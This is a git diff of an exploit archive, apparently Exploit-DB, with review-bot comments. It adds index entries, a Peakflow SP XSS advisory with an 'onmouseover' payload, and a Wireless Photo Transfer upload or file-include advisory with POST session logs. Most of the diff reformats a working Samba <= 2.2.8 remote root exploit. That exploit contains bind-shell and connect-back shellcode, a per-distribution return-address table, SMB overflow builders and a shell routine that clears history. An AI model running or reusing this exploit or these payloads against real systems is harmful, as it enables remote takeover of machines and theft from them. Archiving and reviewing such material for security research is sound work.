diff --git a/files.csv b/files.csv
index 1a5b9e5a6..ca195f6ab 100755
--- a/files.csv
+++ b/files.csv
@@ -9,6 +9,7 @@ id,file,description,date,author,platform,type,port
 8,platforms/linux/remote/8.c,"SETI@home Clients - Buffer Overflow Exploit",2003-04-08,zillion,linux,remote,0
 9,platforms/windows/dos/9.c,"Apache HTTP Server 2.x Memory Leak Exploit",2003-04-09,"Matthew Murphy",windows,dos,0
 10,platforms/linux/remote/10.c,"Samba <= 2.2.8 - Remote Root Exploit",2003-04-10,eSDee,linux,remote,139
+37060,platforms/windows/dos/37060.html,"Internet Explorer 11 - Crash PoC",2015-05-19,Garage4Hackers,windows,dos,0
 11,platforms/linux/dos/11.c,"Apache <= 2.0.44 (Linux) - Remote Denial of Service Exploit",2003-04-11,"Daniel Nystram",linux,dos,0
 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Local Root Exploit",2003-04-14,KuRaK,linux,local,0
 13,platforms/windows/dos/13.c,"Chindi Server 1.0 - Denial of Service Exploit",2003-04-18,"Luca Ercoli",windows,dos,0
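Review bot: The new `37060` row is inserted between ids 10 and 11 instead of after the `37059` row added further down in this same file, so the id column stops being monotonic here and anything that merges or bisects this index by id will misplace the entry. Move the line so it follows `37059,platforms/windows/webapps/37059.html,...` at the end of the file. The row itself is well-formed (eight fields, `dos` type consistent with the "Crash PoC" description).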
@@ -33419,3 +33420,21 @@ id,file,description,date,author,platform,type,port
 37033,platforms/java/webapps/37033.txt,"JBMC Software DirectAdmin 1.403 'domain' Parameter Cross Site Scripting Vulnerability",2012-04-02,"Dawid Golak",java,webapps,0
 37034,platforms/php/webapps/37034.txt,"FlatnuX CMS controlcenter.php contents/Files Action dir Parameter Traversal Arbitrary File Access",2012-04-01,"Vulnerability Laboratory",php,webapps,0
 37035,platforms/php/webapps/37035.html,"FlatnuX CMS Admin User Creation CSRF",2012-04-01,"Vulnerability Laboratory",php,webapps,0
+37036,platforms/linux/dos/37036.txt,"Flock 2.6.1 Denial of Service Vulnerability",2012-03-31,r45c4l,linux,dos,0
+37037,platforms/hardware/remote/37037.txt,"Arbor Networks Peakflow SP 3.6.1 'index/' Cross Site Scripting Vulnerability",2012-04-03,b.saleh,hardware,remote,0
+37038,platforms/php/webapps/37038.txt,"osCMax 2.5 admin/login.php username Parameter XSS",2012-04-04,"High-Tech Bridge SA",php,webapps,0
+37039,platforms/php/webapps/37039.txt,"osCMax 2.5 admin/htaccess.php Multiple Parameter XSS",2012-04-04,"High-Tech Bridge SA",php,webapps,0
+37040,platforms/php/webapps/37040.txt,"osCMax 2.5 admin/xsell.php search Parameter XSS",2012-04-04,"High-Tech Bridge SA",php,webapps,0
+37041,platforms/php/webapps/37041.txt,"osCMax 2.5 admin/stats_products_purchased.php Multiple Parameter XSS",2012-04-04,"High-Tech Bridge SA",php,webapps,0
+37042,platforms/php/webapps/37042.txt,"osCMax 2.5 admin/stats_monthly_sales.php status Parameter XSS",2012-04-04,"High-Tech Bridge SA",php,webapps,0
+37043,platforms/php/webapps/37043.txt,"osCMax 2.5 admin/stats_customers.php sorted Parameter XSS",2012-04-04,"High-Tech Bridge SA",php,webapps,0
+37044,platforms/php/webapps/37044.txt,"osCMax 2.5 admin/information_manager.php information_id Parameter XSS",2012-04-04,"High-Tech Bridge SA",php,webapps,0
+37045,platforms/php/webapps/37045.txt,"osCMax 2.5 admin/geo_zones.php zID Parameter XSS",2012-04-04,"High-Tech Bridge SA",php,webapps,0
+37046,platforms/php/webapps/37046.txt,"osCMax 2.5 admin/new_attributes_include.php Multiple Parameter XSS",2012-04-04,"High-Tech Bridge SA",php,webapps,0
+37047,platforms/php/webapps/37047.html,"osCMax 2.5 admin/login.php username Parameter SQL Injection",2012-04-04,"High-Tech Bridge SA",php,webapps,0
+37048,platforms/php/webapps/37048.txt,"osCMax 2.5 admin/stats_monthly_sales.php status Parameter SQL Injection",2012-04-04,"High-Tech Bridge SA",php,webapps,0
+37055,platforms/php/webapps/37055.txt,"Forma LMS 1.3 Multiple PHP Object Injection Vulnerabilities",2015-05-18,"Filippo Roncari",php,webapps,80
+37056,platforms/windows/local/37056.py,"BulletProof FTP Client 2010 - Buffer Overflow (DEP Bypass)",2015-05-18,"Gabor Seljan",windows,local,0
+37057,platforms/ios/webapps/37057.txt,"Wireless Photo Transfer 3.0 iOS - File Inclusion Vulnerability",2015-05-18,Vulnerability-Lab,ios,webapps,80
+37058,platforms/multiple/webapps/37058.txt,"OYO File Manager 1.1 iOS&Android - Multiple Vulnerabilities",2015-05-18,Vulnerability-Lab,multiple,webapps,8080
+37059,platforms/windows/webapps/37059.html,"ManageEngine EventLog Analyzer 10.0 Build 10001 CSRF Vulnerability",2015-05-18,"Akash S. Chavan",windows,webapps,0
diff --git a/platforms/hardware/remote/37037.txt b/platforms/hardware/remote/37037.txt
new file mode 100755
index 000000000..97b33805b
--- /dev/null
+++ b/platforms/hardware/remote/37037.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/52881/info
+
+Peakflow SP is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+https://www.example.com/index/"onmouseover="alert(666)
\ No newline at end of file
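Review bot: The PoC on the last line is an attribute break-out (`"onmouseover="alert(666)`), which implies the request path is reflected inside a double-quoted HTML attribute on the `index/` page, yet the advisory never names the reflecting element, says whether an authenticated Peakflow session is needed, or notes that the payload only fires when the victim hovers over that element. Worth adding one line such as `The request path is echoed unencoded into a quoted attribute value; the payload closes the attribute and injects an event handler, so triggering requires the victim to mouse over the element.` The advisory should also say that the fix is contextual (attribute) output encoding of the request URI, since a filter that only looks for `<script>` does not cover this vector. Versions other than 3.6.1 are not addressed, and `example.com` stands in for a real Peakflow host, so the reader cannot tell which path prefix is actually vulnerable.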
diff --git a/platforms/ios/webapps/37057.txt b/platforms/ios/webapps/37057.txt
new file mode 100755
index 000000000..1c48f54bc
--- /dev/null
+++ b/platforms/ios/webapps/37057.txt
@@ -0,0 +1,216 @@ +Document Title: +=============== +Wireless Photo Transfer v3.0 iOS - File Include Vulnerability + + +References (Source): +==================== +http://www.vulnerability-lab.com/get_content.php?id=1492 + + +Release Date: +============= +2015-05-12 + + +Vulnerability Laboratory ID (VL-ID): +==================================== +1492 + + +Common Vulnerability Scoring System: +==================================== +6.5 + + +Product & Service Introduction: +=============================== +Transfer your photo without usb. The best wireless photo transfer app on the App Store. + +(Copy of the Vendor Homepage: https://itunes.apple.com/us/app/wireless-photo-transfer/id900376882 ) + + +Abstract Advisory Information: +============================== +The Vulnerability Laboratory Research Team discovered a local file include vulnerability in the official wireless photo transfer mobile v3.0 iOS application. + + +Vulnerability Disclosure Timeline: +================================== +2015-05-12: Public Disclosure (Vulnerability Laboratory) + + +Discovery Status: +================= +Published + + +Affected Product(s): +==================== +Yan Xing +Product: Wireless Photo Transfer - iOS Mobile Web Application 3.0 + + +Exploitation Technique: +======================= +Remote + + +Severity Level: +=============== +High + + +Technical Details & Description: +================================ +A local file include web vulnerability has been discovered in the official wireless photo transfer mobile v3.0 iOS application. +The file include vulnerability allows remote attackers to unauthorized include local file/path requests or system specific +path commands to compromise the mobile web-application. + +The web vulnerability is located in the `album-title` value of the `file upload` module. Remote attackers are able to inject +own files with malicious `filename` values in the `file upload` POST method request to compromise the mobile web-application. 
+The local file/path include execution occcurs in the index file dir listing and sub folders of the wifi interface. The attacker +is able to inject the lfi payload by usage of the wifi interface or local file sync function. Attackers are also able to exploit +the filename issue in combination with persistent injected script code to execute different malicious attack requests. The attack +vector is located on the application-side of the wifi service and the request method to inject is POST. + +The security risk of the local file include vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.5. +Exploitation of the local file include web vulnerability requires no user interaction or privileged web-application user account. +Successful exploitation of the local file include vulnerability results in mobile application compromise or connected device component compromise. + +Request Method(s): + [+] [POST] + +Vulnerable Module(s): + [+] Submit (Upload) + +Vulnerable Parameter(s): + [+] filename (album-title) + +Affected Module(s): + [+] Index File Dir Listing (http://localhost:80/) + + +Proof of Concept (PoC): +======================= +The local file include web vulnerability can be exploited by remote attackers without privileged application user account or user interaction. +For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue. + +PoC: #1 Index File Dir Listing (album-title) + +
+
2 items
+
../[LOCAL FILE INCLUDE VULNERABILITY VIA ALBUMNAME!]
+ + +
+
+ + +PoC: #2 Topic Album (Album Title - album_info_intro_driver) + +
+
+
+

../[LOCAL FILE INCLUDE VULNERABILITY VIA ALBUMNAME!](0-2)

+ +
+
+ +
+ Refresh + Download ZIP +
+
+ + +--- PoC Session Logs [POST] --- +Status: 200[OK] +POST http://localhost:80/upload.html +Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[2] Mime Type[application/x-unknown-content-type] + Request Header: + Host[localhost:80] + User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0] + Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] + Accept-Language[de,en-US;q=0.7,en;q=0.3] + Accept-Encoding[gzip, deflate] + Referer[http://localhost:80/groups] + Connection[keep-alive] + POST-Daten: + POST_DATA[-----------------------------8397114799830 +Content-Disposition: form-data; name="upload1"; filename="../[LOCAL FILE INCLUDE VULNERABILITY VIA ALBUMNAME!]pentesting.png" +Content-Type: image/png +- +Status: 200[OK] +GET http://localhost:80/ +Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[210] Mime Type[application/x-unknown-content-type] + Request Header: + Host[localhost:80] + User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0] + Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] + Accept-Language[de,en-US;q=0.7,en;q=0.3] + Accept-Encoding[gzip, deflate] + Connection[keep-alive] + Response Header: + Accept-Ranges[bytes] + Content-Length[210] + Connection[keep-alive] + Date[Sat, 09 May 2015 15:21:30 GMT] + + + +Reference(s): +http://localhost:80/groups +http://localhost:80/upload.html + + +Solution - Fix & Patch: +======================= +The vulnerability can be patched by a secure parse and encode of the vulnerable album-title value. Encode also the local app input field for sync. +Restrict the filename input and disallow special chars to prevent further arbitrary file upload attacks. Filter and encode also the vulnerable output +values in the mobile wifi interface (file dir) application. 
+ + +Security Risk: +============== +The security risk of the local file include web vulnerability in the wifi network interface album-title value is estimated as high. (CVSS 6.5) + + +Credits & Authors: +================== +Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com] + + +Disclaimer & Information: +========================= +The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed +or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable +in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab +or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for +consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, +policies, deface websites, hack into databases or trade with fraud/stolen material. + +Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com +Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com +Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact +Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab +Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php +Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/ + +Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. 
Permission to
+electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
+Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
+is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
+(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
+
+ Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™
+
+
+
+--
+VULNERABILITY LABORATORY - RESEARCH TEAM
+SERVICE: www.vulnerability-lab.com
+CONTACT: research@vulnerability-lab.com
+PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
+
+
diff --git a/platforms/linux/dos/37036.txt b/platforms/linux/dos/37036.txt
new file mode 100755
index 000000000..7d37d69ef
--- /dev/null
+++ b/platforms/linux/dos/37036.txt
@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/52856/info
+
+Flock is prone to a denial-of-service vulnerability.
+
+Successful exploits will consume excessive resources and will eventually crash the application and possibly the underlying computer, effectively denying service to legitimate users.
+
+Flock 2.6.1 is vulnerable; other versions may also be affected.
+
+
diff --git a/platforms/linux/remote/10.c b/platforms/linux/remote/10.c
index d95b1baaf..f25063ad7 100755
--- a/platforms/linux/remote/10.c
+++ b/platforms/linux/remote/10.c
@@ -92,8 +92,7 @@ pid_t childs[100];
 struct sockaddr_in addr1;
 struct sockaddr_in addr2;
 
-char
-linux_bindcode[] =
+char linux_bindcode[] =
 "\x31\xc0\x31\xdb\x31\xc9\x51\xb1\x06\x51\xb1\x01\x51\xb1\x02\x51"
 "\x89\xe1\xb3\x01\xb0\x66\xcd\x80\x89\xc1\x31\xc0\x31\xdb\x50\x50"
 "\x50\x66\x68\xb0\xef\xb3\x02\x66\x53\x89\xe2\xb3\x10\x53\xb3\x02"
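Review bot: The evidence in the PoC session log supports an unsanitized upload filename, not a file include: the only injected value is `filename="../[LOCAL FILE INCLUDE VULNERABILITY VIA ALBUMNAME!]pentesting.png"` in a multipart POST to `/upload.html`, and the "execution" described in Technical Details is that name being rendered back in the index listing. That is a path-traversal-on-write and/or stored-XSS finding, so the title, the `High` rating and the claim that exploitation needs no user interaction or account should be reworded to match what was demonstrated; the log also shows the service on `localhost:80` over the Wi-Fi interface, so the attacker has to be on the same network. The Solution section would be more actionable as: `Reduce the uploaded filename to its basename on the server, reject any name containing path separators or "..", and HTML-encode the stored name wherever the listing renders it.` The HTML snippets for PoC #1 and #2 appear to have lost their tags in this view, so the exact injection context cannot be confirmed from here.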
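Review bot: This entry carries no trigger at all — after the two boilerplate paragraphs the only concrete line is `Flock 2.6.1 is vulnerable; other versions may also be affected.`, so there is nothing a reader can reproduce, yet files.csv indexes it as a `dos` exploit. The file should at least state the input or action from BID 52856 that exhausts resources, or say explicitly that no public PoC exists. The hunk header announces 13 added lines but only nine are visible here, so some trailing content may have been dropped in this rendering.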
@@ -108,8 +107,7 @@ linux_bindcode[] = "\x08\x50\x53\x89\xe1\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80\x31\xc0" "\x89\xf3\xb0\x06\xcd\x80\xeb\x99"; -char -bsd_bindcode[] = +char bsd_bindcode[] = "\x31\xc0\x31\xdb\x53\xb3\x06\x53\xb3\x01\x53\xb3\x02\x53\x54\xb0" "\x61\xcd\x80\x89\xc7\x31\xc0\x50\x50\x50\x66\x68\xb0\xef\xb7\x02" "\x66\x53\x89\xe1\x31\xdb\xb3\x10\x53\x51\x57\x50\xb0\x68\xcd\x80" @@ -124,8 +122,7 @@ bsd_bindcode[] = "\xcd\x80\x31\xc0\xb0\x01\xcd\x80\x31\xc0\x56\x50\xb0\x06\xcd\x80" "\xeb\x9a"; -char -linux_connect_back[] = +char linux_connect_back[] = "\x31\xc0\x31\xdb\x31\xc9\x51\xb1\x06\x51\xb1\x01\x51\xb1\x02\x51" "\x89\xe1\xb3\x01\xb0\x66\xcd\x80\x89\xc2\x31\xc0\x31\xc9\x51\x51" "\x68\x41\x42\x43\x44\x66\x68\xb0\xef\xb1\x02\x66\x51\x89\xe7\xb3" @@ -136,8 +133,7 @@ linux_connect_back[] = "\x2f\x62\x69\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80\x31\xc0\xb0" "\x01\xcd\x80"; -char -bsd_connect_back[] = +char bsd_connect_back[] = "\x31\xc0\x31\xdb\x53\xb3\x06\x53\xb3\x01\x53\xb3\x02\x53\x54\xb0" "\x61\xcd\x80\x31\xd2\x52\x52\x68\x41\x41\x41\x41\x66\x68\xb0\xef" "\xb7\x02\x66\x53\x89\xe1\xb2\x10\x52\x51\x50\x52\x89\xc2\x31\xc0" 
@@ -153,52 +149,30 @@ struct { char *type; unsigned long ret; char *shellcode; - int os_type; /* 0 = Linux, 1 = FreeBSD/NetBSD, 2 = OpenBSD non-exec -stack */ + int os_type; /* 0 = Linux, 1 = FreeBSD/NetBSD, 2 = OpenBSD non-exec stack */ } targets[] = { - { "samba-2.2.x - Debian 3.0 ", 0xbffffea2, linux_bindcode, -0 }, - { "samba-2.2.x - Gentoo 1.4.x ", 0xbfffe890, linux_bindcode, - 0 }, - { "samba-2.2.x - Mandrake 8.x ", 0xbffff6a0, linux_bindcode, -0 }, - { "samba-2.2.x - Mandrake 9.0 ", 0xbfffe638, linux_bindcode, -0 }, - { "samba-2.2.x - Redhat 9.0 ", 0xbffff7cc, linux_bindcode, - 0 }, - { "samba-2.2.x - Redhat 8.0 ", 0xbffff2f0, linux_bindcode, -0 }, - { "samba-2.2.x - Redhat 7.x ", 0xbffff310, linux_bindcode, -0 }, - { "samba-2.2.x - Redhat 6.x ", 0xbffff2f0, linux_bindcode, -0 }, - { "samba-2.2.x - Slackware 9.0 ", 0xbffff574, linux_bindcode, -0 }, - { "samba-2.2.x - Slackware 8.x ", 0xbffff574, linux_bindcode, - 0 }, - { "samba-2.2.x - SuSE 7.x ", 0xbffffbe6, linux_bindcode, -0 }, - { "samba-2.2.x - SuSE 8.x ", 0xbffff8f8, linux_bindcode, - 0 }, - { "samba-2.2.x - FreeBSD 5.0 ", 0xbfbff374, bsd_bindcode, -1 }, - { "samba-2.2.x - FreeBSD 4.x ", 0xbfbff374, bsd_bindcode, -1 }, - { "samba-2.2.x - NetBSD 1.6 ", 0xbfbfd5d0, bsd_bindcode, -1 }, - { "samba-2.2.x - NetBSD 1.5 ", 0xbfbfd520, bsd_bindcode, - 1 }, - { "samba-2.2.x - OpenBSD 3.2 ", 0x00159198, bsd_bindcode, -2 }, - { "samba-2.2.8 - OpenBSD 3.2 (package)", 0x001dd258, bsd_bindcode, - 2 }, - { "samba-2.2.7 - OpenBSD 3.2 (package)", 0x001d9230, bsd_bindcode, - 2 }, - { "samba-2.2.5 - OpenBSD 3.2 (package)", 0x001d6170, bsd_bindcode, - 2 }, - { "Crash (All platforms) ", 0xbade5dee, linux_bindcode, -0 }, + { "samba-2.2.x - Debian 3.0 ", 0xbffffea2, linux_bindcode, 0 }, + { "samba-2.2.x - Gentoo 1.4.x ", 0xbfffe890, linux_bindcode, 0 }, + { "samba-2.2.x - Mandrake 8.x ", 0xbffff6a0, linux_bindcode, 0 }, + { "samba-2.2.x - Mandrake 9.0 ", 0xbfffe638, linux_bindcode, 0 }, + { "samba-2.2.x - Redhat 9.0 ", 
0xbffff7cc, linux_bindcode, 0 }, + { "samba-2.2.x - Redhat 8.0 ", 0xbffff2f0, linux_bindcode, 0 }, + { "samba-2.2.x - Redhat 7.x ", 0xbffff310, linux_bindcode, 0 }, + { "samba-2.2.x - Redhat 6.x ", 0xbffff2f0, linux_bindcode, 0 }, + { "samba-2.2.x - Slackware 9.0 ", 0xbffff574, linux_bindcode, 0 }, + { "samba-2.2.x - Slackware 8.x ", 0xbffff574, linux_bindcode, 0 }, + { "samba-2.2.x - SuSE 7.x ", 0xbffffbe6, linux_bindcode, 0 }, + { "samba-2.2.x - SuSE 8.x ", 0xbffff8f8, linux_bindcode, 0 }, + { "samba-2.2.x - FreeBSD 5.0 ", 0xbfbff374, bsd_bindcode, 1 }, + { "samba-2.2.x - FreeBSD 4.x ", 0xbfbff374, bsd_bindcode, 1 }, + { "samba-2.2.x - NetBSD 1.6 ", 0xbfbfd5d0, bsd_bindcode, 1 }, + { "samba-2.2.x - NetBSD 1.5 ", 0xbfbfd520, bsd_bindcode, 1 }, + { "samba-2.2.x - OpenBSD 3.2 ", 0x00159198, bsd_bindcode, 2 }, + { "samba-2.2.8 - OpenBSD 3.2 (package)", 0x001dd258, bsd_bindcode, 2 }, + { "samba-2.2.7 - OpenBSD 3.2 (package)", 0x001d9230, bsd_bindcode, 2 }, + { "samba-2.2.5 - OpenBSD 3.2 (package)", 0x001d6170, bsd_bindcode, 2 }, + { "Crash (All platforms) ", 0xbade5dee, linux_bindcode, 0 }, }; void shell(); 
@@ -213,18 +187,14 @@ int start_session(int sock); int exploit_normal(int sock, unsigned long ret, char *shellcode); int exploit_openbsd32(int sock, unsigned long ret, char *shellcode); -void -usage(char *prog) +void usage(char *prog) { fprintf(stderr, "Usage: %s [-bBcCdfprsStv] [host]\n\n" - "-b bruteforce (0 = Linux, 1 = FreeBSD/Net -BSD, 2 = OpenBSD 3.1 and prior, 3 = OpenBSD 3.2)\n" + "-b bruteforce (0 = Linux, 1 = FreeBSD/NetBSD, 2 = OpenBSD 3.1 and prior, 3 = OpenBSD 3.2)\n" "-B bruteforce steps (default = 300)\n" "-c connectback ip address\n" - "-C max childs for scan/bruteforce mode (d -efault = 40)\n" - "-d bruteforce/scanmode delay in micro sec -onds (default = 100000)\n" + "-C max childs for scan/bruteforce mode (default = 40)\n" + "-d bruteforce/scanmode delay in micro seconds (default = 100000)\n" "-f force\n" "-p port to attack (default = 139)\n" "-r return address\n" @@ -236,8 +206,7 @@ onds (default = 100000)\n" exit(1); } -int -is_samba(char *ip, unsigned long time_out) +int is_samba(char *ip, unsigned long time_out) { char nbtname[]= /* netbios name packet */ @@ -290,10 +259,8 @@ is_samba(char *ip, unsigned long time_out) ptr -= 19; - if ( *(ptr + 1) == 0x00 && *(ptr + 2) == 0x00 & -& *(ptr + 3) == 0x00 && - *(ptr + 4) == 0x00 && *(ptr + 5) == 0x00 & -& *(ptr + 6) == 0x00) { + if ( *(ptr + 1) == 0x00 && *(ptr + 2) == 0x00 && *(ptr + 3) == 0x00 && + *(ptr + 4) == 0x00 && *(ptr + 5) == 0x00 && *(ptr + 6) == 0x00) { close(s); return 0; } @@ -310,8 +277,7 @@ is_samba(char *ip, unsigned long time_out) return -1; } -int -Connect(int fd, char *ip, unsigned int port, unsigned int time_out) +int Connect(int fd, char *ip, unsigned int port, unsigned int time_out) { /* ripped from no1 */ 
@@ -360,8 +326,7 @@ Connect(int fd, char *ip, unsigned int port, unsigned int time_out) } - select_status = select(fd + 1, &connect_read, &connect_write, NULL, &ti -meout); + select_status = select(fd + 1, &connect_read, &connect_write, NULL, &timeout); if(select_status == 0) { close(fd); @@ -379,8 +344,7 @@ meout); { getsockopt_length = sizeof(getsockopt_error); - if(getsockopt(fd, SOL_SOCKET, SO_ERROR, &getsockopt_err -or, &getsockopt_length) < 0) { + if(getsockopt(fd, SOL_SOCKET, SO_ERROR, &getsockopt_error, &getsockopt_length) < 0) { errno = ETIMEDOUT; close(fd); return -1; @@ -414,8 +378,7 @@ or, &getsockopt_length) < 0) { return 1; } -int -read_timer(int fd, unsigned int time_out) +int read_timer(int fd, unsigned int time_out) { /* ripped from no1 */ @@ -468,8 +431,7 @@ read_timer(int fd, unsigned int time_out) } } -int -write_timer(int fd, unsigned int time_out) +int write_timer(int fd, unsigned int time_out) { /* ripped from no1 */ @@ -520,12 +482,10 @@ write_timer(int fd, unsigned int time_out) } -void -shell(int sock) +void shell(int sock) { fd_set fd_read; - char buff[1024], *cmd="unset HISTFILE; echo \"*** JE MOET JE MUIL HOUWE -\";uname -a;id;\n"; + char buff[1024], *cmd="unset HISTFILE; echo \"*** JE MOET JE MUIL HOUWE\";uname -a;id;\n"; int n; FD_ZERO(&fd_read); @@ -567,8 +527,7 @@ shell(int sock) exit(0); } -void -handler() +void handler() { int sock = 0; int i = 0; @@ -584,8 +543,7 @@ handler() if(Connect(sock, (char *)inet_ntoa(addr1.sin_addr), 45295, 2) != -1) { fprintf(stdout, "+ Worked!\n" - "---------------------------------------------- -----------------\n"); + "--------------------------------------------------------------\n"); shell(sock); close(sock); } 
@@ -593,17 +551,13 @@ handler() } -int -start_session(int sock) +int start_session(int sock) { char buffer[1000]; char response[4096]; - char session_data1[] = "\x00\xff\x00\x00\x00\x00\x20\x02\x00\x01\x00 -\x00\x00\x00"; - char session_data2[] = "\x00\x00\x00\x00\x5c\x5c\x69\x70\x63\x24\x25 -\x6e\x6f\x62\x6f\x64\x79" - "\x00\x00\x00\x00\x00\x00\x00\x49\x50\x43\x24 -"; + char session_data1[] = "\x00\xff\x00\x00\x00\x00\x20\x02\x00\x01\x00\x00\x00\x00"; + char session_data2[] = "\x00\x00\x00\x00\x5c\x5c\x69\x70\x63\x24\x25\x6e\x6f\x62\x6f\x64\x79" + "\x00\x00\x00\x00\x00\x00\x00\x49\x50\x43\x24"; NETBIOS_HEADER *netbiosheader; SMB_HEADER *smbheader; @@ -628,8 +582,7 @@ start_session(int sock) smbheader->uid = 100; smbheader->mid = 0x01; - memcpy(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER), session_da -ta1, sizeof(session_data1) - 1); + memcpy(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER), session_data1, sizeof(session_data1) - 1); if(write_timer(sock, 3) == 1) if (send(sock, buffer, 50, 0) < 0) return -1; @@ -642,8 +595,7 @@ ta1, sizeof(session_data1) - 1); netbiosheader = (NETBIOS_HEADER *)response; smbheader = (SMB_HEADER *)(response + sizeof(NETBIOS_HEADER)); - if (netbiosheader->type != 0x00) fprintf(stderr, "+ Recieved a non sess -ion message\n"); + if (netbiosheader->type != 0x00) fprintf(stderr, "+ Recieved a non session message\n"); netbiosheader = (NETBIOS_HEADER *)buffer; smbheader = (SMB_HEADER *)(buffer + sizeof(NETBIOS_HEADER)); @@ -663,8 +615,7 @@ ion message\n"); smbheader->tid = 0x00; smbheader->uid = 100; - memcpy(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER), session_da -ta2, sizeof(session_data2) - 1); + memcpy(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER), session_data2, sizeof(session_data2) - 1); if(write_timer(sock, 3) == 1) if (send(sock, buffer, 64, 0) < 0) return -1; 
@@ -682,18 +633,14 @@ ta2, sizeof(session_data2) - 1); return 0; } -int -exploit_normal(int sock, unsigned long ret, char *shellcode) +int exploit_normal(int sock, unsigned long ret, char *shellcode) { char buffer[4000]; char exploit_data[] = - "\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00\x00\x00\x00\x -00\x00\x00" - "\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01\x00\x00\x00\x00\x00\x -00\x00\x00\x00" - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x -00\x00\x00\x00" + "\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x90"; int i = 0; @@ -719,8 +666,7 @@ exploit_normal(int sock, unsigned long ret, char *shellcode) smbheader->tid = 0x01; smbheader->uid = 100; - memset(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER) + sizeof(ex -ploit_data), 0x90, 3000); + memset(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER) + sizeof(exploit_data), 0x90, 3000); buffer[1096] = 0xEB; buffer[1097] = 0x70; @@ -742,18 +688,14 @@ ploit_data), 0x90, 3000); return -1; } -int -exploit_openbsd32(int sock, unsigned long ret, char *shellcode) +int exploit_openbsd32(int sock, unsigned long ret, char *shellcode) { char buffer[4000]; char exploit_data[] = - "\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00\x00\x00\x00\x -00\x00\x00" - "\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01\x00\x00\x00\x00\x00\x -00\x00\x00\x00" - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x -00\x00\x00\x00" + "\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x90"; int i = 0; 
